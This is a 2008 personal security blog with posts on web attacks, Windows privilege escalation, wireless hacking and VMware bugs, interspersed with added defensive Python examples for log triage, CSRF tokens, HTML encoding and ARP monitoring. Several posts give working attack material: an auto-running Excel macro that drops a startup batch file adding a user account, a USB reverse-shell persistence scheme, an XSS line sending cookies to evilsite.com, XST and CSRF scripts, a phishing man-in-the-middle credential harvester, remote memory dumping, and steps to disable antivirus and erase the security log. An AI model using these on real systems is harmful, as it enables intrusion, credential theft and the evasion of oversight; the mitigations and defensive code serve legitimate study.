Monday, December 8, 2008

Apache mod security

I have been working on a web proxy lately to put all of our production web servers behind. My part was to find an IDS to integrate into the proxy. I found mod_security for Apache. It is pretty sweet. Like any IDS it has a bunch of rule sets (SQL injection, XSS, XST, command injection, etc.) that it looks for, and it either logs the request, stops the request, or redirects the request. It is a pretty sweet project and so far it has worked well for us. It is best to only log requests at first, or else the IDS may stop legitimate traffic based on false positives.
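An added example (not from the original post or the ModSecurity project) of the log-only tuning step: it tallies ModSecurity alerts by rule id and URI so that a rule that keeps firing on ordinary traffic can be reviewed before blocking is switched on. The log lines are constructed in the ModSecurity 2.x Apache error-log format; the rule ids, file names and host are made up.

```python
"""Triage ModSecurity alerts while the engine runs in log-only mode."""
import re
from collections import Counter

# Constructed sample lines (not a real log) in the ModSecurity 2.x error-log format.
SAMPLE_LOG = r"""
[Mon Dec 08 10:01:02 2008] [error] [client 10.0.0.5] ModSecurity: Warning. Pattern match "union\s+select" at ARGS:q. [file "/etc/modsecurity/sql.conf"] [line "12"] [id "950901"] [msg "SQL Injection Attack"] [severity "CRITICAL"] [hostname "shop.example"] [uri "/search.php"]
[Mon Dec 08 10:03:41 2008] [error] [client 10.0.0.7] ModSecurity: Warning. Pattern match "union\s+select" at ARGS:q. [file "/etc/modsecurity/sql.conf"] [line "12"] [id "950901"] [msg "SQL Injection Attack"] [severity "CRITICAL"] [hostname "shop.example"] [uri "/search.php"]
[Mon Dec 08 10:09:15 2008] [error] [client 10.0.0.9] ModSecurity: Warning. Pattern match "union\s+select" at ARGS:q. [file "/etc/modsecurity/sql.conf"] [line "12"] [id "950901"] [msg "SQL Injection Attack"] [severity "CRITICAL"] [hostname "shop.example"] [uri "/search.php"]
[Mon Dec 08 10:12:50 2008] [error] [client 192.0.2.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)<script" at ARGS:name. [file "/etc/modsecurity/xss.conf"] [line "8"] [id "958008"] [msg "Cross-site Scripting (XSS) Attack"] [severity "CRITICAL"] [hostname "shop.example"] [uri "/contact.php"]
[Mon Dec 08 10:15:03 2008] [error] [client 10.0.0.5] ModSecurity: Warning. Pattern match "\.\./" at REQUEST_URI. [file "/etc/modsecurity/generic.conf"] [line "30"] [id "950103"] [msg "Path Traversal Attack"] [severity "CRITICAL"] [hostname "shop.example"] [uri "/download.php"]
""".strip()

# Bracketed key/value fields such as [id "950901"] and [uri "/search.php"].
FIELD_RE = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')
CLIENT_RE = re.compile(r'\[client ([^\]]+)\]')


def parse_alert(line):
    """Return the fields of one alert line as a dict, or None if the line
    is not a ModSecurity alert at all."""
    if 'ModSecurity:' not in line:
        return None
    fields = dict(FIELD_RE.findall(line))
    client = CLIENT_RE.search(line)
    fields['client'] = client.group(1) if client else None
    # "Access denied" means the engine blocked; "Warning" means it only logged.
    fields['blocked'] = 'Access denied' in line
    return fields


def triage(log_text, min_hits=2):
    """Group alerts by (rule id, uri) and return the groups with at least
    min_hits alerts, busiest first. A rule that fires repeatedly on one
    ordinary URI from several different clients is a false-positive
    candidate: inspect the matched argument before letting it block."""
    hits = Counter()
    clients = {}
    for line in log_text.splitlines():
        alert = parse_alert(line)
        if not alert or 'id' not in alert:
            continue
        key = (alert['id'], alert.get('uri', '?'), alert.get('msg', ''))
        hits[key] += 1
        clients.setdefault(key, set()).add(alert['client'])
    return [
        {'id': rid, 'uri': uri, 'msg': msg, 'hits': n,
         'clients': len(clients[(rid, uri, msg)])}
        for (rid, uri, msg), n in hits.most_common()
        if n >= min_hits
    ]


if __name__ == '__main__':
    for row in triage(SAMPLE_LOG, min_hits=1):
        print(f"rule {row['id']} on {row['uri']}: {row['hits']} hits from "
              f"{row['clients']} clients ({row['msg']})")
```

In the sample, rule 950901 fires three times on /search.php from three different clients, which is the pattern worth checking for a search form before the engine is allowed to block.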

Who needs admin

So the other day I decided to play around and see what it would take to gain control over a machine without administrative privileges. So this is what I did. I found a reverse connect back shell for Windows on the government security page. Symantec does not detect it. I was going to code my own but I got lucky and found this one first. So then I wrote some batch files and Visual Basic scripts that would save themselves and the revshell into the user directory and user startup directory. These areas are all writable with non-admin privs. The VBS script in the startup directory will start up the revshell each time the user logs in. On a remote server I have netcat listening for a connection from my revshell. I then used my U3 drive and gonzor's switchblade to load the revshell and batch files onto the machine. So in the end all I have to do is plug my jumpdrive into a Windows machine and I have instant control. If the user was running under a non-administrative account I can then use exploits to elevate my privs on the machine. If the user was running an admin account then I have an instant administrative account on the machine. I chose to do it this way to keep antivirus from detecting the attack and to keep a non-administrative user from stopping the attack.

Attack Mitigation:

Run a firewall like zonealarm
Disable windows autorun
Be cautious of what media you put into your machine
Be cautious of what you run

Excel trick

This summer I discovered a fun trick using Excel macros. It is possible to use an Excel macro to save an Excel workbook as a batch file. So I wrote a quick macro to do this. This macro will autorun when the Excel workbook is opened. It will then save itself as a batch file in the startup directory and then change back to an xls file. Because the xls file will be saved line by line as a bat file and bat files will ignore all lines that they don't understand, you can hide one line like "net user /add hacked hackme" in a normal spreadsheet. This could be used for a social engineering attack because most people will just run the macro and never think twice about it. The next time they log in to their account they will run whatever commands you put into your batch file.

Sub Auto_Open()
ActiveWorkbook.SaveAs Filename:= _
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\go.bat", FileFormat:=xlText, _
CreateBackup:=False

ActiveWorkbook.SaveAs Filename:= _
"C:\windows\temp\pw add.xls", FileFormat:=xlNormal, _
Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, _
CreateBackup:=False
End Sub

Wednesday, December 3, 2008

Patiently Waiting

VMware emailed me on Monday to tell me that they have found another problem related to the vmdk crash issue. As a result they have postponed the patching of that issue till Q1 of 2009. They also informed me that they will wait to patch all my other vulnerabilities until Q1 2009. So I am still just patiently waiting. I never realized how long it can take to patch stuff like this.

Wednesday, October 8, 2008

PwnOS

So I have been pretty busy with school lately, so I haven't posted as much as I would like. But I want to make a quick post about a new learning tool that I have found recently. It is called PwnOS and it is pretty cool. It is a set of 3 live Slackware CDs, all with different vulnerabilities and scenarios. I have only started on the 1.110 network CD but it seems pretty cool so far. I have set up a test environment using VMware Server. I have a virtual network on the 192.168.1.0 subnet with DHCP and NAT set up. I also have 2 VMs on that network, a BackTrack 3 machine and a blank VM that I use to run the live boot ISO. It makes for great practice. PwnOS can be downloaded from http://forums.heorot.net/. There is also a preconfigured VM but it does not like to play nice with VMware Server.

Update: I finished the 110 CD. It was pretty fun. I did find that you need to either use BackTrack 2 or get the wordlists from /pentest/passwords/dictionaries in order to complete the challenge in any decent time. I had the passwords in other larger wordlists, but it is best to use the ones supplied in BT2 (they were removed in BT3).

Update:
I finished with the 1.100 CD and I am moving on to the 2.100 CD.

Update:
I finished the 2.100 CD and I am cracking the root password for a bonus. Man... it was so obvious once I figured it out. I can't believe it took me so long. But it was a very good practice CD nonetheless.

Tuesday, September 16, 2008

A look at the Underground

A while ago I attended a presentation given by the VP of security of a large bank. In his presentation he talked a lot about "carding", or the theft of credit card information. He showed us how shockingly open the underground market is. I have been meaning to look into the subject for a while now and recently I began looking and found this excellent white paper here. This paper was written in 2005 but is still quite relevant. It explains how open the underground market is, how they police themselves, how they conduct transactions, and some of their common terminology. If you would like to look into the market do a Google search for or . You will be amazed. Here is an interesting example.
So, how can we put a stop to this? Stop the crooks or stop the market? You stop one crook and he will be quickly replaced, but if you can hinder the market then they are all affected. Obviously it is an extremely complicated issue, but if you could impose a higher cost of doing business upon the market then profits would be adversely affected. If crooks made less money then they would seek other money-making activities. What can be done?

U3 AutoFun

Over the summer Rob, one of the guys I work with, introduced me to Gonzore's Switchblade, a program used to turn your U3 flash drive into an awesome hack tool. Gonzore uses the U3 Universal Customizer to replace the U3 ISO with an ISO that autoloads a bunch of customized hack tools. Windows will not autorun from a USB drive, but the U3 drives have a special controller board that allows them to mount a CD-ROM drive also. Windows will autorun from a CD-ROM drive. This means that since you can customize the ISO on the U3 drive, U3 drives can run any program that you want without ever prompting the user. (There is one extra step needed to make it silently install.) That is pretty ugly: the next time your friend plugs his U3 into your machine he could be silently installing a keylogger, trojan, or almost anything. So watch out.

Attack Mitigation:

It is possible to disable autorun on a windows machine in the following ways:

start>run>gpedit.msc>local computer>administrative template>system>turn off autoplay
start>run>regedit>hkey_local_machine>system>services>cdrom>autorun = 0

Tuesday, August 12, 2008

VMware disk space DoS

So I have been reading the VMware security hardening guide(http://blogs.vmware.com/security/2008/07/update-to-vi3-s.html) and I came across several interesting notes. This one caught my eye:

"Virtual machines can write troubleshooting information to a virtual machine log file (vmware.log) stored on the VMware VMFS volume used to store other files for the virtual machine. Virtual machine users and processes can be configured to abuse the logging function, either intentionally or inadvertently, so that large amounts of data flood the log file. Over time, the log file can consume so much of the ESX/ESXi host’s file system space that it fills the hard disk, causing an effective denial of service as the datastore can no longer accept new writes."

So, I decided to write some code that would do just that. There are many, many ways to achieve this, one of them being a script that invokes the xferlog program that comes with VMware Tools. This method also caused about 50% of the CPU resources to be consumed on the host. It was necessary to throttle my script back a little though, or else it sets off an alarm on the host and stops the logging process. But with the throttled script I can fill about .5Mb/min of disk space.

Attack mitigation:

Use the following VM settings:
log.rotateSize 100000
log.keepOld 10
or
Isolation.tools.log.disable true

Program Debugging

So I have been doing a lot of research on VMware lately, and to understand how a VM communicates with the host I started refreshing myself on assembly code. Here is an excellent tutorial (http://www.xs4all.nl/~smit/asm01001.htm). Next I started to learn how OllyDbg works and I needed some practice applications. http://hackquest.de/ is a "wargame" that has many challenges including a "cracking" section. I downloaded their cracking apps and used them as practice to learn OllyDbg. OllyDbg is a powerful reverse engineering tool, so I will leave the rest of the learning process up to you.

Wednesday, July 23, 2008

Blogger XSS

So I came across this in March 2008 while posting my blog on XSS. I included example code and to my surprise it executed. I emailed Blogspot about this issue but no one really seemed to care. But just so everyone knows, anyone can put malicious code into their Blogspot blog. They designed it to be this way so that people will not be restricted in their blogging creativity. Well that's just great, thanks Google for giving me the creative ability to pwn someone using one of the world's most used blog sites. Take a look at Google's solution to this issue.

http://help.blogger.com/bin/answer.py?answer=67427&topic=12469

They recommend that people report blogs that abuse this. Well, how many people using Blogger know what XSS is, and what about more subtle XSS attacks like cookie theft etc.? I think it is ridiculous that Google is leaving everyone open to this attack. A study posted on stopbadware.com lists google.com as the number 5 most infected domain in the world with 4261 infected sites. How many of those are Blogger blogs? Does Google really disable infected blogs? I doubt it.

http://www.stopbadware.org/home/badwebs

Here is another article about the issue by network world.

http://www.networkworld.com/news/2008/013108-attacker-google-blog.html

Google is notorious for ignoring security, and this is just another example.

Friday, July 18, 2008

VMware Update

VMware has told me that they will be releasing the patch for my previously reported ESX Server vulnerability in Q3. I will write about the issue in full detail at that time. In the meantime I have been spending some of my time looking at the web management interface of VMware Server. I have identified one XSS and one session management issue so far. It seems to me that VMware has a relatively lenient stance when it comes to certain areas of its security. An attacker just needs to know where to look. I can't wait to be able to test on my ESX box when I get back to Utah.

Wednesday, June 18, 2008

Our Welcome to Houston


So in spite of living in a nice gated community in Houston this summer we had our window busted and our GPS stolen the other night. But I get a small amount of comfort knowing that I hacked my GPS first to display this screen on startup. In hindsight I wish I had written STOLEN!!! Please call (MY Phone #). But at least whoever stole it will have a nice surprise waiting for him when he turns it on. What would you think if you bought a new GPS on eBay or at a pawn shop and saw this screen upon startup?

Tuesday, May 27, 2008

Hurray! For Webgoat

Hurray! I finally finished all of the lessons in OWASP's WebGoat application. WebGoat is an awesome application developed by OWASP.org designed to teach people about common web application vulnerabilities and how to exploit them. It is a Tomcat server and web application written in JSP that contains examples of many common web vulnerabilities and instructions and help on how to exploit them. It is an amazing hands-on tool for teaching people how to secure their web applications. I would recommend it to anyone interested in learning about web vulnerabilities.

See: Owasp's Webgoat

Cross Site Tracing(XST)

Cross site tracing is a technique that is used to circumvent Microsoft's httpOnly flag. The httpOnly flag is used to keep scripts from accessing cookie information. The HTTP TRACE method is an HTTP debugging function that echoes back any information sent to it in a TRACE request. For example:

TRACE / HTTP/1.1
Host: mysite.com
Cookie: Auth-cookie.....

would echo the entire request, including the Cookie header, back to the requester. Since a script did not access the cookie, the httpOnly flag did not protect it. An attacker could use an existing cross-site scripting (XSS) vulnerability to insert the following AJAX code into a website.

< script >
var xhr;
var url = "http://mysite.com";
try {
xhr = new ActiveXObject('Msxml2.XMLHTTP');

}
catch (e)
{

try {
xhr = new ActiveXObject('Microsoft.XMLHTTP');

}
catch (e2)
{

try {
xhr = new XMLHttpRequest();

}
catch (e3) { xhr = false; }
}
}

xhr.open('TRACE', url , true);
xhr.send(null);

// collect the response and send it to a site that you control

< /script >

The above code would use AJAX to send a TRACE request to the server hosting the website. The browser would send any cookie information that it holds for the website. The server would then echo back the information that was sent to it by the browser, including the cookie, and the AJAX script could collect the response and send it to a page controlled by the attacker. This is bad because the attacker now has access to important session information.

Attack Mitigation:

1. Disable TRACE on your web servers.

2. Also, luckily for us, Firefox and IE have disabled AJAX TRACE requests. So using one of these browsers will stop this attack using AJAX. It is still possible to execute the attack using other methods like ActiveX though.

For further explanation see: http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf

Monday, May 19, 2008

Cross Site Request Forgery(CSRF)

My boss asked me to start testing our web application for web exploits. So I have been doing a lot of reading and code review lately. It is like a dream come true. But this morning I learned AJAX so that I could do CSRF POST requests via XSS. It seems to be a pretty sweet attack. CSRF is basically just tricking a user into visiting a malicious link, a page controlled by the attacker, or a page with an XSS vulnerability. The attacker then uses one of those methods to execute a GET or POST request against a site that the victim is currently logged into. To the authenticated site it will appear as if the request came from the victim. The request may be as simple as having the victim click a link such as https://victimsite.com/purchase.php?item=tv&quantity=100. The attacker could also use AJAX to execute the request with code like this:

var req;
var url = "https://victimsite.com/purchase.php";
var params = "item=tv&quantity=100";
try {
req = new XMLHttpRequest();
}
catch (e3) { document.write("error") }

req.open('POST', url , true);
req.send(params);

The above AJAX code would be placed on a site with an XSS vulnerability and would be used against a site that uses POST instead of a simple GET request.

Mitigation:

Require a unique session variable to be appended to each request. It also helps to use POST instead of GET. (This only makes it harder, not impossible.)

On a side note, Firefox claims to stop any AJAX code that makes a POST/GET request to any page that is not the parent page.
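An added example (not from the original post) of the mitigation above: a per-session token that every state-changing POST must carry. The /purchase.php handler, the session id and the csrf_token field name are assumptions; the forged item=tv&quantity=100 request from the post is rejected because the attacker's page cannot know the victim's token.

```python
"""Per-session CSRF token, issued with the form and required on the POST."""
import hashlib
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import parse_qs

# Server-side secret; in practice loaded from configuration (assumption).
SECRET_KEY = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Derive the token from the session id so it is bound to one session
    and nothing extra has to be stored server-side."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_valid(session_id: str, submitted: Optional[str]) -> bool:
    """Constant-time comparison; a missing token is simply invalid."""
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id), submitted)


def purchase_form(session_id: str) -> str:
    """The legitimate form embeds the token as a hidden field."""
    return (
        '<form method="POST" action="/purchase.php">'
        f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id)}">'
        '<input name="item"><input name="quantity"><input type="submit"></form>'
    )


def handle_purchase(session_id: str, body: str) -> Tuple[int, str]:
    """Simulated /purchase.php: the session cookie identifies the user, but
    the order is only accepted when the body also carries a valid token."""
    params = {k: v[0] for k, v in parse_qs(body).items()}
    if not csrf_valid(session_id, params.get('csrf_token')):
        return 403, 'rejected: missing or invalid CSRF token'
    return 200, f"ordered {params.get('quantity')} x {params.get('item')}"


if __name__ == '__main__':
    sid = 'session-for-victim'   # constructed session id
    print(handle_purchase(sid, 'item=tv&quantity=100'))   # forged: no token
    print(handle_purchase(sid, 'item=tv&quantity=1&csrf_token=' + csrf_token(sid)))
```

If the XSS is on the same site as the form, the injected script can read the hidden field, so the token only stops requests forged from other origins; the XSS itself still has to be fixed.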

Tuesday, May 13, 2008

VMware ESX server 3 issue

I have been busy at work developing a homegrown backup system for virtual machines on VMware ESX Server 3, and while working the other day I came across a bug that causes the entire ESX server to crash. The error is in the way ESX Server handles virtual disk files. I created a virtual disk delta file that was empty except for a special magic number at the beginning of the file. When the ESX server tried to power on the virtual machine containing my fake disk it caused the whole ESX host to dump its memory and crash (purple screen of death). Since this is only a local vulnerability it is not a very big deal. But if used creatively it could be used to create a DoS of every virtual server running on the host. It could be delivered by tricking someone into downloading and installing a virtual appliance containing the specially crafted file. The VMware reps tell me that every Fortune 500 company uses VMware ESX. Interesting...

Saturday, April 26, 2008

My first cantenna



I actually made this cantenna last November, but I have been playing with it a lot since school got out. I went to a thrift store the other night and got a great tripod for 2 dollars. The tripod really helps a ton. I still don't have an exact number for my gain, but I think that it gives me about an extra 5 dB. I found several new open access points near my apartment the other night after I mounted it on the tripod. I think I will try a few different designs this summer.

Wednesday, April 9, 2008

PHP and SQL Injection

Lately I have been playing around a lot with PHP vulnerabilities and SQL injection. I found some really great guides on milw0rm and read as much as I could. I also needed a test box running PHP and an SQL server to experiment on. I installed XAMPP because it was so quick and easy to set up. I made a few scripts to test on, but upon further inspection of their PHP code I found that there were plenty of exploits in the sample applications. The CD app and the phonebook app both have SQL injection vulnerabilities and the phonebook has a stored XSS vulnerability. I then did a Google search (intitle: xampp version) and found that there are many systems on the net that have XAMPP installed with a default setup. I was able to learn by playing around with XAMPP.

Friday, March 28, 2008

XSS cookie theft

Cross Site Scripting (XSS) is a vulnerability that is caused when web programmers fail to validate user input that is later published on the page. If an attacker were to input a script like < script > alert("hello world!")< /script > into a form, then the JavaScript would be published on the page and executed in the browser as if it came from the site itself. The previous script is harmless, but if an attacker were to input a script like < script > window.open("http://evilsite.com/cookiegrabber.php?cookies="+document.cookie); < /script > the attacker could steal the session cookies from every user who visits the XSS vulnerable site. This vulnerability is common on search pages written in PHP, but it can be found in any page that accepts user input. There are many variations on this attack and it seems to be very popular.

Attack mitigation: Check all user input and convert the characters ( < > / % " ' + & ) to literal values like &lt; and &gt; before storing them or displaying them on a page.

Thanks to Xylitol and CgiSecurity for their helpful guides.
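An added example (not from the original post) of the output encoding described in the mitigation: it encodes exactly the character set the post lists as numeric character references, so the cookie-grabber payload above is shown as text instead of running. render_search_page is a stand-in for a PHP search page that echoes the query back; it is an assumption, not code from any real application.

```python
"""Output-encode untrusted input before writing it into an HTML page."""
import html

# The characters the post lists, each mapped to a numeric reference (&#NN;).
UNSAFE = '(<>/%"\'+&)'
ENCODE_TABLE = {ord(c): f'&#{ord(c)};' for c in UNSAFE}

# The cookie-theft payload from the post, as a test input.
PAYLOAD = ('<script>window.open("http://evilsite.com/cookiegrabber.php?cookies="'
           '+document.cookie);</script>')


def encode_for_html(text: str) -> str:
    """Encode in one pass with str.translate, so '&' in the input is never
    encoded twice. This is correct for HTML body text; attribute values and
    JavaScript strings need their own context-specific encoding."""
    return text.translate(ENCODE_TABLE)


def render_search_page(query: str) -> str:
    """Echo the search term back into the page, encoded."""
    return f'<p>Results for: {encode_for_html(query)}</p>'


def is_inert(encoded_fragment: str) -> bool:
    """True when an encoded fragment contains no raw markup characters,
    i.e. nothing the browser could parse as a tag or attribute delimiter."""
    return not any(c in encoded_fragment for c in '<>"\'')


if __name__ == '__main__':
    encoded = encode_for_html(PAYLOAD)
    print(render_search_page(PAYLOAD))
    # The browser decodes the references for display only, so the user sees
    # the original text and no script runs.
    print(html.unescape(encoded) == PAYLOAD)
```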

Do I smell Gmail cookies?

I have always wanted to know how session hijacking via cookie theft worked. So I decided to try it for myself on my home network. This vulnerability occurs when websites use session cookies to validate a user's access to resources. Often websites encrypt the initial login session but then pass the session cookie back and forth in plain text. Under these conditions it is possible for an attacker to use a packet sniffer to capture the session cookie and use it to gain access to a victim's account. On my home network I was able to capture my Gmail session cookie using Wireshark. I was then able to reinsert it into a session on a different computer using WebScarab and gain access to my account without logging in. To make things worse, Gmail sessions never really time out unless you log out. Since many people store valuable information in their email I feel like this is a particularly dangerous vulnerability. I think Gmail needs to encrypt their entire session. I don't think I will ever check my Gmail over an unsecured network again. I am going to start using my mail client with SSL instead.

Tuesday, March 18, 2008

Active Man-in-the-Middle Attack

So I have always heard that it is possible to use a Man-in-the-Middle attack to completely control the network traffic of your victim. I got to thinking about this and decided to find out just how hard it would be. I found out that it was not hard at all. My goal was to execute a Man-in-the-Middle attack that redirected my victim to my own server when they tried to access the page www.gmail.com. So I used my favorite Man-in-the-Middle tool, Cain & Abel, to execute the Man-in-the-Middle portion of the attack. I then did an nslookup on www.gmail.com and added their IP address as a second address on my attack machine. So now when my victim requests gmail.com my web server responds before the request ever hits the real gmail.com server. I then saved the source of the Gmail login page to my own machine. I took my new page that looks exactly like Gmail's login and made a few modifications. Instead of the login form sending its data to the Gmail server I sent it to my own JSP page called Save_info.jsp. The save info page takes their username and password and stores it to a text file on the server and then logs them in to the real Gmail and redirects them to mail.google.com. The user never even knows that they were just hacked because they get logged into their Gmail account as expected. The only indicator of trouble is that my page will appear as http://www.gmail.com while the real page would appear as https://www.gmail.com. It is really kind of frightening because most users would never even check to make sure there is an https in the URL. It took me about 1 hour to craft this attack.

Attack Mitigation:

1. If possible, make a static ARP entry for your gateway. This will stop the Man-in-the-Middle attack from working.
2. Use a program like Arpwatch that checks for changes in your ARP table.
3. Watch for the https in the URL.
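An added example (not from the original post) of the Arpwatch-style check in mitigation 2: compare two ARP-table snapshots and alert when the gateway's MAC changes or when one MAC answers for several IPs, which is what ARP poisoning leaves behind. The snapshots are constructed in the format of Windows `arp -a` output; the addresses are made up, and capturing the snapshots on a timer is left to the caller.

```python
"""Detect gateway MAC changes and duplicate MACs between ARP snapshots."""
import re

# One row of `arp -a` output: IP, MAC (dash or colon separated), type.
ARP_ROW = re.compile(
    r'^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+'                # IP address
    r'([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+'    # MAC address
    r'(dynamic|static)', re.IGNORECASE)

# Constructed snapshot: the gateway 192.168.1.1 has its own MAC.
SNAPSHOT_BEFORE = """\
Interface: 192.168.1.10 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.20          00-aa-bb-cc-dd-ee     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed snapshot a minute later: the host at 192.168.1.20 now also
# claims the gateway's IP, the signature of ARP cache poisoning.
SNAPSHOT_AFTER = """\
Interface: 192.168.1.10 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-aa-bb-cc-dd-ee     dynamic
  192.168.1.20          00-aa-bb-cc-dd-ee     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""


def parse_arp_table(text):
    """Return {ip: mac} with MACs normalised to lower-case colon form."""
    table = {}
    for line in text.splitlines():
        m = ARP_ROW.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace('-', ':')
    return table


def mac_changes(previous, current, watched=None):
    """(ip, old_mac, new_mac) for every IP whose MAC differs between the two
    snapshots; restricted to `watched` IPs (e.g. the gateway) when given."""
    return [
        (ip, previous[ip], mac)
        for ip, mac in sorted(current.items())
        if ip in previous and previous[ip] != mac
        and (watched is None or ip in watched)
    ]


def duplicate_macs(table):
    """{mac: [ips]} for MACs that appear under more than one unicast IP."""
    owners = {}
    for ip, mac in table.items():
        if int(ip.split('.')[0]) >= 224:      # skip multicast/reserved rows
            continue
        owners.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in owners.items() if len(ips) > 1}


if __name__ == '__main__':
    before = parse_arp_table(SNAPSHOT_BEFORE)
    after = parse_arp_table(SNAPSHOT_AFTER)
    for ip, old, new in mac_changes(before, after, watched={'192.168.1.1'}):
        print(f'ALERT: {ip} moved from {old} to {new}')
    for mac, ips in duplicate_macs(after).items():
        print(f'ALERT: {mac} answers for {", ".join(ips)}')
```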

Friday, March 14, 2008

Dumpster Diving in Memory

I recently read an article about how information can remain active in memory even after the machine has been powered off. A group of researchers were using this information to try and break disk encryption. I also read an article at http://www.beginningtoseethelight.org/ntsecurity/ that interested me. These articles inspired me to look around and see what I can find in memory. So I started by using a tool called pmdump and HxD to view the memory space of my active processes. In the ntsecurity article they claim that a user's password is stored in plain text in the memory space belonging to the lsass service. I tested this by logging in and immediately dumping the lsass memory. I also tried this on the winlogon service and was never able to find my password in plain text. I also used dd to dump the entire physical memory of my system and was not able to find my Windows password anywhere in memory. It might be so volatile that it gets erased before I dump my memory, but I have not tested this yet. Maybe I could make a script and execute it after login. I didn't have luck with the system password, but I was able to consistently find my password in memory for ***** hidden passwords for any program. All I had to do was open HxD, view the memory space for that program, and search for the password in Unicode. Many programs had common markers by the passwords. I also had good luck finding passwords post-login using the same method. However, most programs write to memory so often that the passwords are quickly lost. I was especially interested in recovering post-login passwords in Firefox and IE. I found that these are usually highly volatile but can often be found by searching in ASCII mode for the POST variables (i.e. passwd=, password=, pw=).
Because memory is so volatile you need luck on your side to find passwords in memory. But thanks to memory paging and hibernation, many items can be stored in pagefile.sys and hiberfil.sys. Depending on the size of these files they can store information for quite some time. A good search of a system's page file and hibernation file could yield positive results.
Thanks to the ntsecurity article and the Sysinternals suite I was able to make my attack remote. By issuing the following commands it is possible to dump the memory of a remote machine.

pslist \\
psexec \\ -u -p -c pmdump
move \\\$remotedir localdir

Because many organizations use the same administrative account and password for multiple computers, if an attacker were able to obtain the admin password he could remotely dump the active memory of every computer he has access to. Administrators often use weak administrative passwords on all their desktop machines because they say "If someone breaks the password the worst that can happen is they screw up one machine. I will reimage it and it will be fixed. It's not like it's a server." Using this memory attack a creative attacker could cause a lot of damage.

Tuesday, March 11, 2008

FTK

It has been a while since I have posted. This is because I have been working on a project for my digital forensics class. It has been pretty interesting and I have learned a lot about the Forensic Tool Kit (FTK), steganography, EFS, PGP, and basic zip encryption. It's been great, but don't worry, I should be ready to post soon on finding information in pagefile.sys and physical memory dumps.

Monday, February 25, 2008

Why MAC filtering is poor wireless security

MAC filtering on a wireless access point is easily bypassed. Many organizations use MAC filtering as a means of keeping non-paying customers off of their wireless network. I have seen 2 basic implementations of this:
1. Device can't read or pass any traffic across the network unless its MAC is in the list.
2. Device can read but can't pass traffic (except ARP/DHCP) across the network unless its MAC is in the list.

Both 1 and 2 can be bypassed by using Kismet and listing the connected devices. The attacker then spoofs his MAC to look like an authenticated device. 2 can also be bypassed by connecting to the access point and using Wireshark to see which devices are sending TCP traffic. Once again the attacker spoofs his MAC address to look like a device that is sending TCP traffic.

Wireless Cracking Help

It can be really painful to try and get the right card, driver, and wireless tools working together. I have found that the BackTrack security suite makes this a little easier. They have added most of the drivers you need to their distro. BackTrack even detects and configures your card for you on bootup. I have tried BackTrack with many different PCMCIA wireless cards and almost all of them have worked. I picked up an Orinoco Gold card off of eBay for $30. This card is obviously a knockoff but it was cheap and it uses the same firmware. It also has an external antenna adapter that I can attach to my cantenna. The card has actually worked pretty well for me. But the BackTrack suite is my tool of choice for cracking wireless networks. It does a great job of bringing the drivers and the tools together.

War Drive in Provo

Since the Home Depot and TJ Maxx incidents there has been a lot of talk about wireless security at retail stores. It was insecure wireless networks at these two stores that allowed hackers to gain access to the "secure" internal corporate network. I was curious about this and decided to see for myself, except I decided to look at private home networks instead. I used my Orinoco Gold card and NetStumbler to conduct my experiment. I drove through some of the residential areas of Provo, Utah counting the number of secure vs. insecure access points. I did the same in Idaho Falls, Idaho. I was amazed to find that in Provo 46% of the access points had no security enabled and in Idaho Falls 51% of the access points had no security enabled. The statistics may vary, but I think they are quite telling. Something really needs to be done to help protect the general public. (Note: I did not attempt to access any of the networks in this test. That would be unethical and potentially illegal.)

Wednesday, February 20, 2008

Elevate any account to administrator

This is kind of a cheap shot because you can do almost anything by booting to another OS. But it is possible to elevate your account to an administrative account simply by booting to another OS like Knoppix and using a number of strategies. One method of doing this is:
1. Create an exe that executes a command like "net user localgroup administrators /add "
2. Boot into Knoppix from a CD or flash drive and mount the Windows system drive as writable.
3. Replace an exe on the system that will be run under the system account with your exe.
4. Boot into Windows and log in. As soon as the service is run it will elevate your account.

This is one of many attacks that can be executed this way.

Attack mitigation:

Create a bios or if possible harddisk password and disallow cd/usb boot.

From Admin to System user

This can be done with one command. As administrator open a command prompt. Type "at

Disable Symantec Antivirus

It is nearly impossible to stop Symantec Antivirus. Even after all Symantec services are stopped it still continues to scan. This is because it continues to run from a rooted directory located at program files\symantec antivirus\OEM. But it is possible to disable Symantec.
1. Stop the Symantec Antivirus service
2. Stop the DefWatch service
3. Rename the \program files\common files\symantec shared\virusdefs directory

Symantec will continue to scan but it won't be able to find its virus definitions. Symantec will correct itself at the next LiveUpdate, so this is not a long-term hack. This will also cause Symantec to log system errors and tamper errors.

Tuesday, February 19, 2008

How to elevate Windows Power user to Administrator

This one has been a real eye-opening project for me. In order to minimize administrative burden many organizations use the Power Users group. The power user does have limited privileges, but this only gives a false sense of security. It is extremely easy for a power user to elevate themselves to an administrative user. It is this easy:

1. Find a service that runs as the system user and can be written to by the power user group.(ex. many symantec services)
2. program an exe that adds your user to the administrator group.
3. stop the service
4. replace the service exe with your exe.
5. restart the service
6. run net localgroup administrators. Look you are now an administrator.
7. relogin

Attack mitigation:

Don't use power user
Remove power user write privs to all services that run under an elevated user account. (Impossible.)

Friday, February 15, 2008

Erase windows security log

The security log can't be deleted while the Event Log service is running. Set the "Event Log" service to disabled and restart the machine. Then delete the file "\windows\system32\config\SecEvent.evt". The values in this file can also be changed with a hex editor. Reset the Event Log service to automatic and it will restart the next time the machine restarts.

Thursday, February 14, 2008

Exporting IE password files to another computer

